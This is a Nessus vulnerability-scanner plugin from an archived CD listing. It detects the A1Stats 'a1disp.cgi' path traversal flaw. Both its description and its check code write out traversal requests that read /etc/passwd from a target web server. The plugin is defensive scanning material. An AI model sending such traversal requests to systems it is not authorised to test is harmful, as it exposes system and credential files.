home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / a1stats.nasl < prev    next >
Text File  |  2005-01-14  |  2KB  |  87 lines

  1. #
  2. # This script was written by Renaud Deraison <deraison@cvs.nessus.org>
  3. #
  4. # See the Nessus Scripts License for details
  5. #
  6.  
  7. if(description)
  8. {
  9.  script_id(10669);
  10.  script_bugtraq_id(2705);
  11.  script_cve_id("CAN-2001-0561");
  12.  script_version("$Revision: 1.17 $");
  13.  
  14.  name["english"] = "A1Stats Traversal";
  15.  name["francais"] = "A1Stats";
  16.  script_name(english:name["english"], francais:name["francais"]);
  17.  
  18.  desc["english"] = "The 'a1disp.cgi' CGI script was found on 
  19.  this system. The script allows an attacker to view any file 
  20.  on the target computer by requesting :
  21.  
  22. GET /cgi-bin/a1disp*.cgi?/../../../../etc/passwd
  23.  
  24. Solution : Delete the 'a1disp.cgi' script.
  25.  
  26. Risk factor : High";
  27.  
  28.  desc["francais"] = "Le CGI 'a1disp' permet α un 
  29. pirate de lire n'importe quel fichier sur la machine cible
  30. au travers de la commande :
  31.  
  32. GET /cgi-bin/a1disp*.cgi?/../../../../etc/passwd
  33.  
  34. Facteur de risque : ElevΘ
  35.  
  36. Solution : Supprimez cette page";
  37.  
  38.  script_description(english:desc["english"], francais:desc["francais"]);
  39.  
  40.  summary["english"] = "Checks if A1Stats reads any file";
  41.  summary["francais"] = "DΘtermine si a1stats lit n'importe quel fichier";
  42.  
  43.  script_summary(english:summary["english"], francais:summary["francais"]);
  44.  
  45.  script_category(ACT_GATHER_INFO);
  46.  
  47.  
  48.  script_copyright(english:"This script is Copyright (C) 2001 Renaud Deraison",
  49.         francais:"Ce script est Copyright (C) 2001 Renaud Deraison");
  50.  family["english"] = "CGI abuses";
  51.  family["francais"] = "Abus de CGI";
  52.  script_family(english:family["english"], francais:family["francais"]);
  53.  script_dependencie("find_service.nes", "http_version.nasl");
  54.   script_require_ports("Services/www", 80);
  55.  exit(0);
  56. }
  57.  
  58. #
  59. # The script code starts here
  60. #
  61. include("http_func.inc");
  62. include("http_keepalive.inc");
  63.  
  64. function check(str)
  65. {
  66.   req = http_get(port:port, item:str);
  67.   r = http_keepalive_send_recv(port:port, data:req);
  68.   if( r == NULL ) exit(0);
  69.   if(egrep(pattern:".*root:.*:0:[01]:", string:r))return(1);
  70.   return(0);
  71. }
  72.  
  73. port = get_http_port(default:80);
  74.  
  75.  
  76. if(get_port_state(port))
  77. {
  78.   foreach dir (cgi_dirs())
  79.   {
  80.   req = string(dir, "/a1disp3.cgi?/../../../../../../etc/passwd");
  81.   if(check(str:req)){security_hole(port);exit(0);}
  82.   req = string(dir, "/a1stats/a1disp3.cgi?/../../../../../../etc/passwd");
  83.   if(check(str:req)){security_hole(port);exit(0);}
  84.   }
  85. }
  86.  
  87.